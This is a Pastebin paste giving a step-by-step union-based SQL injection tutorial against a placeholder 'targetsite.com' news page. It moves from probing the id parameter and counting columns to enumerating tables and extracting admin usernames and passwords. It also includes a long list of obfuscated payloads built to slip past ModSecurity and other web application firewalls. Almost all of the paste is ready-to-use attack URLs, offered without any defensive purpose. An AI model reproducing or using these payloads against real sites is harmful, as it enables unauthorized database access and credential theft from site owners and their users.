API tools faq
paste
Advertisement
Kyfx

Union Based SQL Injection (WAF Bypassing)

Kyfx
Jul 8th, 2015
975
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.32 KB | None | 0 0
raw download clone embed print report
  1. Here Is Our Target .
  2.  
  3. http://www.targetsite.com/news.php?id=11
  4. Add Single Quote (') at the End Of The URL .
  5.  
  6. http://www.targetsite.com/news.php?id=11'
  7.  
  8. And Get MYSQL Error.
  9. Lets Balance Our Query for Further Injecting.
  10. Some Comments from our Previous Tutorials.
  11.  
  12. http://www.targetsite.com/news.php?id=11--
  13.  
  14. http://www.targetsite.com/news.php?id=11--+
  15.  
  16. http://www.targetsite.com/news.php?id=11-- -
  17.  
  18. http://www.targetsite.com/news.php?id=11%23
  19.  
  20. http://www.targetsite.com/news.php?id=11;
  21.  
  22. Here Is A Small Explanation on Balance and Comment in our Injection.
  23.  
  24.  
  25. After Balancing Our Query . Next is Count Total Number Of Columns
  26. http://www.targetsite.com/news.php?id=11 order by 1--+
  27. No Error !
  28. http://www.targetsite.com/news.php?id=11 order by 3--+
  29. No Error!
  30.  
  31. http://www.targetsite.com/news.php?id=11 order by 5--+
  32. Again No Error !
  33.  
  34. http://www.targetsite.com/news.php?id=11 order by 6--+
  35. Here We Get Error !
  36. Unknown column '6' in 'order clause'
  37.  
  38. Now Try To Find Our Vulnerable Columns.
  39.  
  40. http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+
  41.  
  42. If Our Target site Is Protected with WAF . WAF Will Block Our Query and Give Us Mod_Security Error.
  43.  
  44. So Here some WAF Bypassing Methods.
  45. /*!%55NiOn*/ /*!%53eLEct*/
  46. %55nion(%53elect 1,2,3)-- -
  47. +union+distinct+select+
  48. +union+distinctROW+select+
  49. /**//*!12345UNION SELECT*//**/
  50. /**//*!50000UNION SELECT*//**/
  51. /**/UNION/**//*!50000SELECT*//**/
  52. /*!50000UniON SeLeCt*/
  53. union /*!50000%53elect*/
  54. +#uNiOn+#sEleCt
  55. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  56. /*!%55NiOn*/ /*!%53eLEct*/
  57. /*!u%6eion*/ /*!se%6cect*/
  58. +un/**/ion+se/**/lect
  59. uni%0bon+se%0blect
  60. %2f**%2funion%2f**%2fselect
  61. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  62. REVERSE(noinu)+REVERSE(tceles)
  63. /*--*/union/*--*/select/*--*/
  64. union (/*!/**/ SeleCT */ 1,2,3)
  65. /*!union*/+/*!select*/
  66. union+/*!select*/
  67. /**/union/**/select/**/
  68. /**/uNIon/**/sEleCt/**/
  69. /**//*!union*//**//*!select*//**/
  70. /*!uNIOn*/ /*!SelECt*/
  71. +union+distinct+select+
  72. +union+distinctROW+select+
  73. Just Change The Union Select With Following Bypass URLs.
  74.  
  75. Lets Continue Our Tutorial.
  76. Now Check The Vulnerable Columns.we Use ( - ) for Finding Vulnerable columns.
  77.  
  78. We Can Also Check Vulnerable Columns with Other methods instead of Just Using (-).
  79.  
  80. Here Are Some Vulnerable Columns Checking Methods With Examples.
  81. Using And 0
  82. http://www.targetsite.com/news.php?id=11 and 0 Union Select 1,2,3,4,5--+
  83.  
  84. Using And False
  85. http://www.targetsite.com/news.php?id=11 and false Union Select 1,2,3,4,5--+
  86.  
  87. Using Div 0
  88. http://www.targetsite.com/news.php?id=11 Div 0 Union Select 1,2,3,4,5--+
  89.  
  90. Using null
  91. http://www.targetsite.com/news.php?id=null Union Select 1,2,3,4,5--+
  92.  
  93. Using .1337
  94. http://www.targetsite.com/news.php?id=11.1337 Union Select 1,2,3,4,5--+
  95.  
  96.  
  97. http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+
  98.  
  99. We Will Get Our Vulnerable Columns Printed On The Page.3 is Our Vulnerable Column.
  100.  
  101.  
  102.  
  103. Here Are Some Variables Of MYSQL.
  104.  
  105. @@version = Current Version
  106. @@GLOBAL.VERSION = Current Version
  107. User() = Current User
  108. Database = Current Database
  109.  
  110. http://www.targetsite.com/news.php?id=-11 Union Select 1,2,@@version,4,5--+
  111.  
  112. We Can See Current Version Printed on the Page.
  113. Next Step Is To Get The Tables.
  114. http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=database()--+
  115.  
  116. We can See Total Tables in Our Primary Database.
  117. Now if you Want To Get Admin Details Of The Target Site check the Table name of Admin.
  118. then encode admin table name in MYSQL Char() to get The Columns in the Admin Table.Change table_name to column_name,information_schema.tables to information_schema.columns and Table_schema to Table_name.And Replace Database() with our MYSQL Char() admin value.
  119.  
  120. http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(column_name),4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--+
  121.  
  122. we can see the Column Names on Page . like id,username,pass
  123. to Get The Data From columns here is our final Query.
  124. http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(username,0x3a,password),4,5 from admin--+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!